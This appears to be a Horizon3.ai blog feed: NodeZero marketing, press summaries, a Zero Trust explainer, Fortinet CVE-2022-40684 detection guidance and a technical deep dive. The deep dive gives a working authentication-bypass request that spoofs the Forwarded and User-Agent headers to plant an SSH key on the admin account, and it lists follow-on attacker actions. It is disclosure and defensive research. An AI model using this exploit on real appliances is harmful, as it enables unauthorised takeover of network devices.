Pen testers, vulnerability scanners, and installed agents alert on potential vulnerabilities and breaches. You receive a list, or a notification, and you respond. Ever wonder how much of your time and effort is being wasted fixing things that don’t actually matter?

You may be surprised to hear that a large majority of all vulnerabilities are unexploitable. According to data compiled by Kenna, in 2020, only 2.7% of the vulnerabilities found appeared to be exploitable and only 0.4% of those vulnerabilities were actually observed to be exploited at all.

The prioritization of these low-risk or no-risk vulnerabilities alongside, or even above, the truly exploitable vulnerabilities can actually cause an organization’s security posture to suffer. It takes significant time and coordination to find the asset owners, bring them up to speed on the issue, prepare downtime for the asset, remediate the issue, and then confirm that the issue is remediated. Meanwhile, more critical vulnerabilities are waiting in line for their turn to be remediated. If you can’t properly prioritize, you will never secure your network.

A client came to Horizon3.ai with the goal of validating the services they were using for pentesting, vulnerability scanning and remediation. Their IT services had all been outsourced to a managed security service provider (MSSP) with a hefty price tag; they wanted to make sure they were getting what they paid for.

The MSSP had just conducted their annual pentest of the organization’s network environment. Horizon3.ai used NodeZero to assess the organization’s network, with the following comparative results:

Why Coverage and Accuracy Matter

The hardest part of cyber security is deciding what NOT to fix because of limited time and resources.

Manual Pen Testing creates an incomplete snapshot:

  • No exploits exist, or conditions to exploit are extrememly unlikely, for 22/28 of the MSSP’s critical findings
  • Poor enumeration leads to blind spots and incomplete fingerprinting – port scans are not enough!
  • Partial coverage leads to missed critical findings

Fixing 79% of the critical issues highlighted in the MSSP’s report would have been an inefficient use of time and effort. These so-called “critical issues” did not have exploits, were blindly assumed due to poor enumeration, or the conditions for exploitability were extremely unlikely.

Meanwhile, the MSSP’s team only identified one host vulnerable to BlueKeep, while NodeZero found an additional 11. NodeZero also proved three additional critical/high weaknesses, including easily guessable root access to a database server.

When the noise is removed, the critical findings are revealed.

The Horizon3.ai Difference

Thinking like an attacker gives you a distinct advantage as you devise a defensive strategy.

The attacker’s perspective asks:

  • What is an attacker interested in doing or achieving?
  • What methods are realistically at their disposal?
  • What things about your environment makes achieving their intentions possible, or even easy?

We believe that these questions can only be answered by an “attacker-mindset” pentest, which should be performed frequently on your entire environment so risks do not accrue, and should produce findings that guide your remediation actions with a heavy bias towards efficiency and return on investment.

Horizon3.ai delivers these outcomes through NodeZero, our autonomous penetration testing-as-a-service (APTaaS) platform. NodeZero is an on-demand, self-service platform that is safe to run in production and requires no persistent or credentialed agents.

Within our Portal, we provide the following supporting information for every weakness NodeZero finds:

  • Path NodeZero followed to identify/discover the weakness.
  • Proof of exploitability of the weakness.
  • Context and severity of the finding, which can be used to determine business impact.
  • Fix action report you can follow to remediate the weaknesses.

The Future State

Overall, the comparison between the MSSP’s report and the NodeZero report shows that NodeZero provides broader coverage, proves exploitability, contextualizes weaknesses, and provides the defensive team with the information they need to fix what matters.

Our work with this client exemplifies the need for a proactive security posture that includes continuous assessment, so you can catch up, keep up and even stay ahead.

Catch Up

Identify exploitable attack paths that must be fixed immediately, significantly reducing the opportunities for exploitation, sensitive data exposure, elevated privileges or remote code execution.

Your first NodeZero operation will provide this insight and minimize the time spent dealing with false positives.

For me, the biggest benefit is the attack path identification and actual prioritization of the vulnerabilities. Other tools simply pull the CVE value, and we get hundreds of criticals and highs.

Keep Up

Establish a purple team culture to find exploitable problems, fix them and then verify that the problems no longer exist. Your red team should be working with your blue team to maximize coordination.

You can run multiple NodeZero operations per week – our licenses give you unlimited access.
Use NodeZero’s compare feature to power your security standups.

Stay Ahead

Continuously verify your security controls – tools, processes, policies – by measuring and optimizing your detection, remediation and compliance response times.

Use our reports to show your leadership and board where you stand. Not just a compliance checkbox; this is effective security.

The post Vulnerable ≠ Exploitable: A lesson on prioritization appeared first on Horizon3.ai.

What to expect during the ‘Horizon3.ai Drives Global Partner-First Approach’ event: Join theCUBE Sept. 27

26 September 2022 at 13:44

SiliconANGLE: 09/26/22

Horizon3.ai’s partner program covers the company’s efforts for managed service providers, managed security service providers, and consultants to offer NodeZero to customers — all as part of the company’s channel-led, go-to-market strategy.

Read the entire article here

The post What to expect during the ‘Horizon3.ai Drives Global Partner-First Approach’ event: Join theCUBE Sept. 27 appeared first on Horizon3.ai.

Horizon3.ai Expands Global Partner Program, Taps Jennifer Lee to Lead

28 September 2022 at 13:53

Brilliance Security Magazine: 09/28/22

“The Horizon3.ai Partner Program enables partners to leverage the industry’s most advanced, comprehensive penetration testing available. By using NodeZero, partners can help their clients find and fix attack vectors before attackers can exploit them, then verify any issue is resolved,” said Lee.

Read the entire article here

The post Horizon3.ai Expands Global Partner Program, Taps Jennifer Lee to Lead appeared first on Horizon3.ai.

Uber Systems Breached – Full Access Claimed

16 September 2022 at 14:29

VMBlog 09/16/22

This is really just testament to the fact that almost every multi-million dollar security program is worth nothing without employee awareness, clean data hygiene practices, and constant validation of security controls through testing. We’ve seen way too many examples of credentialed attacks still being the #1 utilized attack vector for attackers.

Read the entire article here

The post Uber Systems Breached – Full Access Claimed appeared first on Horizon3.ai.

Horizon3 positions Partner Program expansion as a value-add for MSPs, MSSPs and resellers

27 September 2022 at 14:09

SiliconANGLE: 09/27/22

“First of all, there is a raising demand in penetration testing,” said Rainer Richter. “And, internationally, we have a much higher percentage of SMBs and mid-market customers. So, for them, pentesting was just too expensive. With our offering together with our partners, we can provide different ways for customers to get autonomous pentesting done more than once a year with even lower costs than they had with traditional manual pentests.”

Read the entire article here

The post Horizon3 positions Partner Program expansion as a value-add for MSPs, MSSPs and resellers appeared first on Horizon3.ai.

Horizon3.ai Drives Global Partner-First Approach with Expansion of Partner Program

27 September 2022 at 14:11

AITHORITY: 09/27/22

“Most MSSPs and VARs don’t have the talent for pentesting, and trying to staff this position can be incredibly difficult,” said Christopher Prewitt, CTO of Inversion6. “Partnering with Horizon3.ai has been a game changer for us, as it’s allowed us not only to perform new services for our customers, but also provide a product where customers can pentest their own network – both internally and externally.”

Read the entire article here

The post Horizon3.ai Drives Global Partner-First Approach with Expansion of Partner Program appeared first on Horizon3.ai.

Horizon3.ai Promotes Global Partner-First Approach with Expansion of Partner Program

28 September 2022 at 14:13

ITSecurityWire: 09/28/22

“The driving force behind creating our new partner program really aligns with our channel-first commitment and how we go-to-market,” said Snehal Antani, CEO and co-founder of Horizon3.ai. “Autonomous pentesting enables the next-generation of security assessments.

Read the entire article here

The post Horizon3.ai Promotes Global Partner-First Approach with Expansion of Partner Program appeared first on Horizon3.ai.

81% of Companies Suffered A Cloud Security Incident Last Year – Horizon3.ai

30 September 2022 at 14:41

Information Security Buzz:09/30/22

Over the past year, studies show that companies with cloud-based security solutions have had at least one security incident in their cloud environment. In contrast, cloud-based security is likely more “up-to-date” than on-premises solutions as the cloud-based security company maintains its solution in compliance with industry standards

Read the entire article here

The post 81% of Companies Suffered A Cloud Security Incident Last Year – Horizon3.ai appeared first on Horizon3.ai.

Three things you might have missed from the ‘Horizon3.ai Drives Global Partner-First Approach’ event

3 October 2022 at 14:46

SiliconANGLE:10/03/22

For enterprise cybersecurity initiatives to be effective today, they must be continuous and proactive. Organizations simply can’t risk a real breach to test their security mettle. But what does it take for cybersecurity strategies to be deemed proactive? Usually, it implies a balanced mix of observability and continuous verification.

Read the entire article here

The post Three things you might have missed from the ‘Horizon3.ai Drives Global Partner-First Approach’ event appeared first on Horizon3.ai.

BOD 23-01 – Fed Civilian Agencies Must Report Network Vulns To CISA – Expert Comments

5 October 2022 at 14:44

Information Security Buzz:10/05/22

CISA Director Jen Easterly announced a new Binding Operational Directive (BOD 23-01) on Monday requiring all Federal civilian agencies to report detailed data about vulnerabilities to CISA at timed intervals using automated tools. Snehal Antani commented, “Typically, attackers know more about your enterprise than you do. They gain initial access into your enterprise, discover all of your assets, and plan angles of attack to achieve their objectives. It’s critical for all organizations, including Federal agencies, to view their enterprises through the eyes of an attacker to ensure they don’t have rogue, misconfigured, or vulnerable assets on their network that could lead to a compromise.”

Read the entire article here

The post BOD 23-01 – Fed Civilian Agencies Must Report Network Vulns To CISA – Expert Comments appeared first on Horizon3.ai.

FortiOS, FortiProxy, and FortiSwitchManager Authentication Bypass IOCs (CVE-2022-40684)

11 October 2022 at 19:33

Introduction

The recent FortiOS / FortiProxy / FortiSwitchManager CVE has been reportedly exploited in the wild. We would like to provide additional insight into the vulnerability so users can begin to determine if they have been compromised. In this post we discuss enabling logging and IOCs for FortiOS 7.2.1. These steps will likely work on other vulnerable products, however we do not have other products configured in our lab for testing. Additionally, we will be releasing a technical deep dive and POC for this CVE later this week.

Logging

If not already configured, REST API logging can be set through the Fortinet CLI with the following commands:

fortios_7_2_1 # config log setting
fortios_7_2_1 (setting) # set rest-api-set enable
fortios_7_2_1 (setting) # set rest-api-get enable
fortios_7_2_1 (setting) # end
fortios_7_2_1 # 

IOCs

In addition to the recommendations by Fortinet to check the device’s log for user=”Local_Process_Access”, any affected system should also be checked for logs with user_interface=”Node.js” or user_interface=”Report Runner”. See the screenshots below for examples of the exploit running on our lab systems.

node js log

node js log

report runner log

report runner log

The exploit can be used with any HTTP method (GET, POST, PUT, DELETE, etc). Additionally, the REST API request failing is not an indication that an attacker was unsuccessful. In our lab environment, we were able to modify the admin users’ SSH keys though a REST API request that reportedly failed. We would also like to note that a system configured for production use may produce logs that match these IOCs naturally. However, we would not expect these IOCs to match with URLs targeting sensitive REST API endpoints.

Attacker Mindset

The collection /api/v2/ endpoints can be used to configure the system and modify the administrator user. Any logs found that meet the above conditions and also have a URL containing /api/v2/ should be cause for concern. Further investigation of any matching log entries can reveal any damage an attack has done. Additionally, an attacker may perform the following actions to further compromise a system:

  • Modify the admin users’ SSH keys to enable the attacker to login to the compromised system.
  • Add new local users.
  • Update networking configurations to reroute traffic.
  • Download the system configuration.
  • Initiate packet captures to capture other sensitive system information.

The post FortiOS, FortiProxy, and FortiSwitchManager Authentication Bypass IOCs (CVE-2022-40684) appeared first on Horizon3.ai.

What is Zero Trust – and How NodeZero Can Help

13 October 2022 at 15:41

Zero Trust. Everyone’s talking about it, but what does it truly mean, and how can you prove that your organization is using a Zero Trust model effectively?  

Where did Zero Trust come from? For the security veterans among us, we remember the old network security adage: inside the network was trusted, and outside of the network was untrusted. Think of the old castle-and-moat image commonly used to describe a network. This perimeter-based approach doesn’t work in today’s modern and agile threat landscape. Additionally, the implicit trust assumed with “inside” the network invokes risk. Hackers no longer hack in – they log in. Your Zero Trust framework goes out the door when an attacker gets in and creates their own trust.  

Modern workplaces have evolved. Gone are the days when everyone walks into a brick-and-mortar building for work. To get the best talent and the most flexibility in today’s evolving business world, remote work has become ubiquitous, and that means you’ve got personnel requesting access to your network from everywhere. You can’t build a moat big enough to protect a network that varied.  

The core tenants of Zero Trust are pretty clear: no one receives automatic trust from your network; if you’re going to grant access, grant only the access required and no more; verify that person’s identity before granting access; and do not assume that once the person (or device) is verified, they are always who they say they are – constantly re-verify to be safe. 

How does this framework align with autonomous pentesting? 

Representation of ZTNA in a stylized graphic form.

Defining ZTA  

Let’s start with some baseline understanding. Rather than implying trust because of the user’s network location, Zero Trust believes that network location or IP addresses do not imply trust – it instead looks at identity and context. To put it simply: no one is trusted inside or outside the network without having their identity verified. Remember the old castle and moat analogy? Once you were on the right side of the moat (to the network), you were trusted. But with Zero Trust, identity authentication, not location, is how organizations keep their data safe.  

 The name “Zero Trust” is borne from the “default deny” posture. If a user or device wants access to anything, they must be verified or that access is denied. And when we accept that hackers don’t hack in, they log in, your credentials and authentication are that much more valuable to your business, and an attacker. If attackers are looking for credentials to get the keys to get to your crown jewels, ensuring usernames and passwords are being used by who they should be, and only so, is top priority. 

Least privilege 

The next tenant of Zero Trust: least privilege. If a user requests access to a document, application, folder, or so on, they are granted access to that resource and nothing more. It’s not unlike locking down a building – not every employee needs a skeleton key to every room in your headquarters. If they lose that passkey and it falls into the wrong hands, a dangerous stranger could be weaving in and out of your entire property. The same principle applies here. 

The trust that is given is ephemeral (time-bound) and continually reevaluated. That user or device is re-verified with new requests to ensure they are who they say they are before further access is granted. Identities are verified through measures like multi-factor authentication, endpoint verification, or even physical keys provided by the organization linked to the user’s identity.  

Who, what, and where  

Zero Trust focuses on more than user identity; it also involves knowing what devices are on your network. With the explosion of cloud services and proliferation of work-from-home users, a company’s attack surface has dramatically changed, and will continue to.  Clearly, this is one more reason why the attraction of Zero Trust frameworks are resonating. For example, home users are often criticized for leaving default passwords or factory settings on Internet of Things (IoT) devices like baby monitors or home security cameras, but businesses have adopted that risk, knowingly or willingly or not! With the number of devices that can be tied to a business’s network (including employee home networks), the professional world is as much, if not more, at risk and it’s up to security practitioners at these organizations to know every asset– hosts and people (credentials)–which is on their network. Understanding your environment is key to a Zero Trust framework.  

How NodeZero can help   

At Horizon3.ai, our core mission is: continuously verify your security posture. NodeZero does this and does it fast, identifying assets that are reachable, vulnerable, and exploitable. It looks for usernames and weak passwords that would allow hackers to log in easily. It also chains vulnerabilities, misconfigurations, or dangerous default settings and credentials, just like an attacker would in order to delve deeper and persist longer in your network.  

The hardest part in cybersecurity is deciding what not to do. Horizon3.ai understands that no one has enough time to do everything they need to do – new risks, vulnerabilities, and threats emerge  all the time. Prioritization so you can fix what matters most is a dire need for the best of security professionals. NodeZero context-scores every weakness, host, and credential, based on your environment and what impact that compromised asset led to. NodeZero provides the path with proof, so you know exactly how your “crown jewels” were discovered, and even provides fix actions so you know how to remediate the attack paths immediately.  

And similar to Zero Trust access, our philosophy is always verify. NodeZero can be re-run immediately – and as often as you need to – in order to make sure the fix actions you have taken are in effect. Don’t wait for an annual pentest or an actual data breach to find out you missed a misconfiguration or if a patch wasn’t completed.   

Zero Trust isn’t a single tool – it’s a philosophy and a framework. And that means for many organizations, Zero Trust is cobbled together using various tools, policies, and practices. A cobbled-together system, no matter how well thought out or considered, will have blind spots and weak links as tools run up against each other that are not designed to work well together. NodeZero’s find, fix, verify loop can find chinks in the armor of an organization’s Zero Trust plan to ensure those gaps are identified, repaired, and in working order. Introduced a new tool or process? NodeZero can act fast to ensure no new risks have been introduced before someone else finds them.  

Everyone has blind spots – we’re human. NodeZero’s autonomous pentesting is a force multiplier for identifying those blind spots so you can shine a light on them and secure them before a bad actor can make use of them. 

Want to learn more about NodeZero? Set up a demo today 

The post What is Zero Trust – and How NodeZero Can Help appeared first on Horizon3.ai.

Horizon3.ai Named Finalist for Cloud Security Innovation of the Year in 2022 SDC Awards

13 October 2022 at 16:33

Businesswire: 10/13/22

The SDC Awards recognize and reward products and services that are the foundation for digital transformation. NodeZero has been named a ‘Cloud Security Innovation of the Year’ finalist. NodeZero was selected for its impact on the market and value provided to customers and partners.

Read the entire article here

The post Horizon3.ai Named Finalist for Cloud Security Innovation of the Year in 2022 SDC Awards appeared first on Horizon3.ai.

FortiOS, FortiProxy, and FortiSwitchManager Authentication Bypass Technical Deep Dive (CVE-2022-40684)

13 October 2022 at 16:45

Introduction

Fortinet recently patched a critical authentication bypass vulnerability in their FortiOS, FortiProxy, and FortiSwitchManager projects (CVE-2022-40684). This vulnerability gives an attacker the ability to login as an administrator on the affected system. To demonstrate the vulnerability in this writeup, we will be using FortiOS version 7.2.1

POC

Let’s examine the inner workings of this vulnerability. You can find our POC here. The vulnerability is used below to add an SSH key to the admin user, enabling an attacker to SSH into the effected system as admin.

PUT /api/v2/cmdb/system/admin/admin HTTP/1.1 Host: 10.0.40.67 User-Agent: Report Runner Content-Type: application/json Forwarded: for=”[127.0.0.1]:8000″;by=”[127.0.0.1]:9000″; Content-Length: 612 { “ssh-public-key1”: “\”ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDIOC0lL4quBWMUAM9g/g9TSutzDupGQOnlYqfaNEIZqnSLJ3Mfln6rGSYol/WSm6/N7TNpuVFScRtmdUZ9O8oSamyaizqMG5hcRKRiI49F49judolcffBCTaVpQpxqt+tjcuGzZAoIqg6TyHg1BNoja/IjUQIVbNGyzl+DxmsX3mbmIwmffoyV8l4sEOynYqP3TC2Z8wJWv3WGudHMEDXBiyN3lrIDKlHzROWBkGQOcv3dCoYFTkzdKYPMtnTNdGOOF6wgWB3Y/fHyyWvbN23N2mxsgbRMdKTItJJNLGiJwYBHnC3lp2CQQlrYfsAnBQRu56gp7TPgheP+UYyGlYy4mcnsanGYCS4VozGfWwvhTSGEP5Uws/WxWNFq3Be7c/IWPx5AzvzT3iOq9R704xL1BxW9KAkPmjegav/jOEEh5YX7b+HcErMpTfo5DCi0CZilBUn9q/qM3v4HWKgJObaJnycE/PPyZML0xof29qvbXJDy2efYeCUCfxAIHUcJx58= [email protected]\”” }

Deep Dive

FortiOS exposes a management web portal that allows a user configure the system. Additionally, a user can SSH into the system which exposes a locked down CLI interface. Our first step after familiarizing ourselves with the system was to diff the vulnerable firmware with the patched firmware.

Firmware Examination

We obtained a VMware zip file of the firmware which contained two vmdk files. First, we examined the vmdk files with virt-filesystems and mounted them with guestmount:

$>ls *.vmdk
datadrive.vmdk fortios.vmdk
$>sudo virt-filesystems --filesystems -a fortios.vmdk 
/dev/sda1
$>sudo mkdir fortios_mount
$>sudo guestmount -a fortios.vmdk -m /dev/sda1 --ro fortios_mount
$>cd fortios_mount
$>ls
boot.msg datafs.tar.gz extlinux.conf filechecksum flatkc flatkc.chk ldlinux.c32 ldlinux.sys lost+found rootfs.gz rootfs.gz.chk

Next, we extract the root filesystem where we find a hand full of .tar.xz files:

$>sudo cp ../fortios_mount/rootfs.gz .
$>gunzip rootfs.gz 
$>cpio -i 2> /dev/null < rootfs 
$>ls
bin.tar.xz bin.tar.xz.chk boot data data2 dev etc fortidev init lib lib64 migadmin.tar.xz node-scripts.tar.xz proc rootfs sbin sys tmp usr usr.tar.xz usr.tar.xz.chk var

Interestingly, attempting to decompress the xz files fail with corruption errors:

$>xz --decompress *.xz
xz: bin.tar.xz: Compressed data is corrupt
xz: migadmin.tar.xz: Compressed data is corrupt
xz: node-scripts.tar.xz: Compressed data is corrupt
xz: usr.tar.xz: Compressed data is corrupt

Its unclear if this is an attempt at obfuscation, but we find a version of xz in the sbin folder of the firmware. We can’t run it as is, but we can patch its linker to point to our system linker to finally decompress the files:

$>xz --decompress *.xz
xz: bin.tar.xz: Compressed data is corrupt
xz: migadmin.tar.xz: Compressed data is corrupt
xz: node-scripts.tar.xz: Compressed data is corrupt
xz: usr.tar.xz: Compressed data is corrupt
$>find . -name xz
./sbin/xz
$>./sbin/xz --decompress *.xz
bash: ./sbin/xz: No such file or directory
$>file ./sbin/xz
./sbin/xz: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /fortidev/lib64/ld-linux-x86-64.so.2, BuildID[sha1]=eef5d20a9f8760df951ed122a5faf4de86a7128a, for GNU/Linux 3.2.0, stripped
$>patchelf --set-interpreter /lib64/ld-linux-x86-64.so.2 sbin/xz
$>./sbin/xz --decompress *.xz
$>ls *.tar
bin.tar migadmin.tar node-scripts.tar usr.tar

Next, we untar the files and begin examining their contents. We find /bin contains a large collection of binaries, many of which are symlinks to /bin/init. The migadmin folder appears to contain the frontend web code for the administrative interface. The node-scripts folder appears to contain a NodeJs backend for the administrative interface. Lastly, the usr folder contains a libaries folder and an apache2 configuration folder.

The Patch

We apply the same steps to firmware version 7.2.2 to enable diffing of the filesystems. In the bin folder, we find the large init binary has changed and in the node-scripts folder we find the index.js file has changed:

index.js diff

index.js diff

This diff shows that the httpsd proxy handler explicitly sets the forwarded, x-forwarded-vdom, and x-forwarded-cert headers. This gives us a hint as to where to start looking for clues on how to exploit this vulnerability.

HTTPSD and Apache Handlers

After some searching, we discover that the init binary we mentioned earlier contains some strings matching the headers in the NodeJs diff. This init binary is rather large and appears to have a lot of functionality including Apache hooks and handlers for various management REST API endpoints. To aid in our research, we SSH’d into the system and enabled debug output for the httpsd process:

fortios_7_2_1 # diagnose debug enable 
fortios_7_2_1 # diagnose debug application httpsd -1
Debug messages will be on for 5 minutes.
fortios_7_2_1 # diagnose debug cli 8
Debug messages will be on for 5 minutes.

While investigating the forwarded header, we find an apache access_check_ex hook that parses the header, extracts the for and by fields, and attaches them to the Apache request_rec structure. You can see that the for field allows us to set the client_ip field on the request record’s connection.

forwarded header parsing

forwarded header parsing

Additionally, we see a log message that mentioned which handler is used for a particular request.

[httpsd 12478 - 1665412044     info] fweb_debug_init[412] -- Handler "api_cmdb_v2-handler" assigned to request

After searching for the handler string, we find an array of handlers in the init binary:

hander array

hander array

After investigating some of the handlers, we find that many of them make a call to a function we named api_check_access:

api_check_access

api_check_access

We were immediately drawn to api_check_access_for_trusted_source which first checks if the vdom socket option is trusted, but then falls through to a function we called is_trusted_ip_and_user_agent.

is_trusted_ip_and_user_agent

is_trusted_ip_and_user_agent

You can see that this function checks that the client_ip is “127.0.01” and that the User-Agent header matches the second parameter. This function gets called with two possible parameters: “Node.js” and “Report Runner”. The “Node.js” path seems to perform some additional validation, but using “Report Runner” allows us to bypass authentication and perform API requests!

Weaponization

The ability to make unauthenticated request to the the REST API is extremely powerful. However, we noticed that we could not add or change the password for the admin user. To get around this we updated the admin users SSH-keys to allow us to SSH to the target as admin. See our original announcement.

Summary

To wrap things up here is an overview of the necessary conditions of a request for exploiting this vulnerabilty:

  1. Using the Fowarded header an attacker is able to set the client_ip to  “127.0.0.1”.
  2. The “trusted access” authentication check verifies that the client_ip is “127.0.0.1” and the User-Agent is “Report Runner” both of which are under attacker control.

Any HTTP requests to the management interface of the system that match the conditions above should be cause for concern. An attacker can use this vulnerability to do just about anything they want to the vulnerable system. This includes changing network configurations, adding new users, and initiating packet captures. Note that this is not the only way to exploit this vulnerability and there may be other sets of conditions that work. For instance, a modified version of this exploit uses the User-Agent “Node.js”. This exploit seems to follow a trend among recently discovered enterprise software vulnerabilities where HTTP headers are improperly validated or overly trusted. We have seen this in recent F5 and VMware vulnerabilities.

The post FortiOS, FortiProxy, and FortiSwitchManager Authentication Bypass Technical Deep Dive (CVE-2022-40684) appeared first on Horizon3.ai.

Secure Your Fortinet Appliances Across On-Prem, Cloud, and Hybrid Networks at Scale

18 October 2022 at 16:12

If there’s one thing we love seeing, it’s people using NodeZero to assess their hybrid cloud at scale, especially when verifying a fix.

While unannounced zero-day vulnerabilities garner a fair bit of fear and attention, one of the greatest risks introduced to business operations are newly announced vulnerabilities, or N-days. When an easily exploitable vulnerability surfaces for a ubiquitous product, we’re all in a race condition to:

  1. Find any assets (especially public-facing) that are vulnerable
  2. Fix (remediate or mitigate) as quickly and safely as possible
  3. Verify the implemented fix action is actually working when attacked

For example, over the last week cybersecurity practitioners have been scrambling to remediate their Fortinet appliances to the latest CVE-2022-40684. In case you missed it, here’s a rundown to catch you up:

A quick online search reveals several articles outlining the vulnerability and its ongoing mass exploitation. When an easily exploitable vulnerability surfaces for such a ubiquitous product, we’re all in a race condition to fix while attackers are trying to exploit.

In the image below, you will see part of an administrator’s NodeZero operations summary screen, where several of our customers and new free-trial users are quickly verifying their security posture.

Some wanted to focus on specific known hosts running the vulnerable OS, while others wanted to find, fix, and verify “at-scale” across their entire enterprise product network.  This is how our users find that appliance that wasn’t supposed to be public-facing anymore, where that host set up by marketing that was supposed to have been decommissioned years ago, or where those third-party authentications your developers utilized while your product was in stage didn’t promote to prod. This is how we all verify that our weekend fix-actions are effective.

For instance, here’s how one client used NodeZero:

They used NodeZero to find and verify their Fortinet appliance was vulnerable, reachable, and exploitable from their chosen perspective, or launch point.  They didn’t need to install an agent, create a script, and load a credential. They just used our simple Course of Action card, specified a scope, and launched a pentest.

Their first test came back confirming their appliance was exploitable.

This is the attack path NodeZero took enroute to compromising this host and critical infrastructure.

You can see NodeZero autonomously discovered the host, checked that the web service on Port 80 was up and running, found that the Fortigate SSL VPN application was running, then ran our exploit, taking advantage of the appliance OS browser header and looking for a specific server IP address as authoritative, told it to reach out to our interact server, and once compromising the host NodeZero provides proof by showing the contents of the administrator user settings.

Now that they know it’s exploitable, what did they do?  17 minutes later they ran a second attack just to verify it really was. After confirming, the next pentest we see is the following morning:

And now you can see the comparison, where the hosts are still reachable but no longer vulnerable nor exploitable.

This is how we win.

Bottom Line: we’re simplifying the ability for anyone to verify if their appliances are reachable, vulnerable, and exploitable. Can your other tools do that at speed and scale?

This article was authored by Monti Knode, Director of Customer and Partner Success at Horizon3.ai. 

The post Secure Your Fortinet Appliances Across On-Prem, Cloud, and Hybrid Networks at Scale appeared first on Horizon3.ai.

❌
❌